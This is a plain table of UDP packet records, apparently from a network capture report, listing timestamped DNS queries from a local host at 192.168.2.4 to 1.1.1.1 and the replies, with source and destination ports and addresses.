                                                                                                                                                                                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.273377895 CEST5252753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.397173882 CEST53525271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.203593969 CEST6135353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.213407993 CEST53613531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.117877960 CEST5955853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.126497984 CEST53595581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.683916092 CEST5273953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:59.692158937 CEST5273953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.136785984 CEST53527391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.136868954 CEST53527391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.208221912 CEST6320053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.216262102 CEST53632001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.927560091 CEST5777453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.937522888 CEST53577741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.462033987 CEST6358053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.471822977 CEST53635801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.640499115 CEST5779253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.648447990 CEST53577921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.555834055 CEST5043653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.565486908 CEST53504361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.566420078 CEST4924953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.574161053 CEST53492491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:03.453448057 CEST6094253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:03.462570906 CEST53609421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.035509109 CEST4968553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.044408083 CEST53496851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.046783924 CEST5607753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.055921078 CEST53560771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.058389902 CEST6549953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.069319963 CEST53654991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.661509037 CEST5085353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.768430948 CEST53508531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.056502104 CEST5965653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.065259933 CEST53596561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.066010952 CEST5753353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:06.075315952 CEST53575331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.304588079 CEST6337753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.311435938 CEST53633771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.312314987 CEST5114853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.319875002 CEST53511481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.321635008 CEST6318653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.329819918 CEST53631861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.487287045 CEST5577453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.496702909 CEST53557741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.438119888 CEST6327953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.448232889 CEST53632791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.435421944 CEST5472753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.443048954 CEST53547271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.134319067 CEST5864353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.555598021 CEST53586431.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.608376980 CEST6547453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.616730928 CEST53654741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.956599951 CEST6037353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.964734077 CEST53603731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.357985020 CEST5840553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.366291046 CEST53584051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.554475069 CEST6551553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.563415051 CEST53655151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.392577887 CEST6519153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.406192064 CEST53651911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.765997887 CEST5091653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.774672031 CEST53509161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.577131033 CEST4989053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.585037947 CEST53498901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.642941952 CEST6166353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.651650906 CEST53616631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.410362005 CEST5264953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.422286987 CEST53526491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.969723940 CEST5197053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.980623007 CEST53519701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.284267902 CEST5132853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST53513281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.902477026 CEST6209153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.910003901 CEST53620911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.029062033 CEST5512253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.229948044 CEST53551221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.319195032 CEST5193553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.327291965 CEST53519351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.887706995 CEST5350953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.075503111 CEST53535091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.192673922 CEST5319353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.200038910 CEST53531931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.917565107 CEST6174853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.925452948 CEST53617481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.024544001 CEST5323953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.133580923 CEST53532391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.699821949 CEST5462153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.707488060 CEST53546211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.966543913 CEST5052553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.168936014 CEST53505251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.317666054 CEST5040153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST53504011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.475619078 CEST5844853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.658698082 CEST53584481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.791481972 CEST5175653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.990386009 CEST53517561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.476006985 CEST5022153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.484894037 CEST53502211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.812159061 CEST5433653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.123692036 CEST53543361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.377132893 CEST6005053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.385152102 CEST53600501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.189074993 CEST5404453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.196222067 CEST53540441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.218003035 CEST5036253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.225687027 CEST53503621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.040446997 CEST5723153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.048091888 CEST53572311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.087846994 CEST5845353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.181853056 CEST53584531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.822004080 CEST6314253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.830239058 CEST53631421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.803138018 CEST5561853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.811986923 CEST53556181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.144165993 CEST4999453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.151696920 CEST53499941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.347379923 CEST6359353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.355309010 CEST53635931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.900764942 CEST6549453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.908399105 CEST53654941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.000443935 CEST6279153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.010552883 CEST53627911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.875027895 CEST6491053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.882520914 CEST53649101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.355310917 CEST6222653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.362889051 CEST53622261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.363804102 CEST5945953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.371299982 CEST53594591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.848520041 CEST5880253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.856000900 CEST53588021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.964797974 CEST4928453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.973038912 CEST53492841.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.611051083 CEST5181453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.808923006 CEST53518141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.123080015 CEST6042053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.317178011 CEST53604201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.462775946 CEST5759753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.661354065 CEST53575971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.922153950 CEST6089053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.931345940 CEST53608901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.900885105 CEST5311053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.908610106 CEST53531101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.243163109 CEST5333453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.253679991 CEST53533341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.819854975 CEST6246253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.827857971 CEST53624621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.135782003 CEST5982553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.153832912 CEST53598251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.535593987 CEST6210853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.543379068 CEST53621081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.547425032 CEST5891353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.556078911 CEST53589131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.622749090 CEST5423753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.631300926 CEST53542371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.392416000 CEST6256053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.400057077 CEST53625601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.090029001 CEST5740553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.151376963 CEST5642653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.159790039 CEST53564261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.270854950 CEST53574051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.140163898 CEST5350453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.147747040 CEST53535041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.790467024 CEST6513353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.798365116 CEST53651331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.862623930 CEST5091153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.869848967 CEST53509111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.492038012 CEST5390353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.499866962 CEST53539031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.481775045 CEST5609053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.489759922 CEST53560901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.511537075 CEST6073753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.541712046 CEST53607371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.287781000 CEST5257853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.295649052 CEST53525781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.597270012 CEST5469353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.605644941 CEST53546931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.802829981 CEST6345553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.906305075 CEST53634551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.097446918 CEST5581853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.281294107 CEST53558181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.759212017 CEST6407253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.767105103 CEST53640721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.058988094 CEST5046053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.066489935 CEST53504601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.692397118 CEST5052853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.699423075 CEST53505281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.177506924 CEST5012853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.186758995 CEST53501281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.228328943 CEST5899853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.235970020 CEST53589981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.239413977 CEST5963753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.246922016 CEST53596371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.911716938 CEST5170053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.921395063 CEST53517001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.611911058 CEST5863253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.711159945 CEST53586321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.766700029 CEST5172853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.775360107 CEST53517281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.470787048 CEST5013253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.478424072 CEST53501321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.982357025 CEST5907953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.990777969 CEST53590791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.830379009 CEST5611753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.839298010 CEST53561171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.889893055 CEST6069453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.898057938 CEST53606941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.233333111 CEST5071053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.240900040 CEST53507101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.415793896 CEST6188953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.423928022 CEST53618891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.714534044 CEST5095553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.726070881 CEST53509551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.240989923 CEST6010653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.248605013 CEST53601061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.518723011 CEST5038553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.527308941 CEST53503851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.742652893 CEST6462553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.932609081 CEST53646251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695209980 CEST4924853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.883683920 CEST53492481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.214281082 CEST5320153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.221669912 CEST53532011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.146472931 CEST6015553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.154342890 CEST53601551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.834548950 CEST6182053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.841463089 CEST53618201.1.1.1192.168.2.4
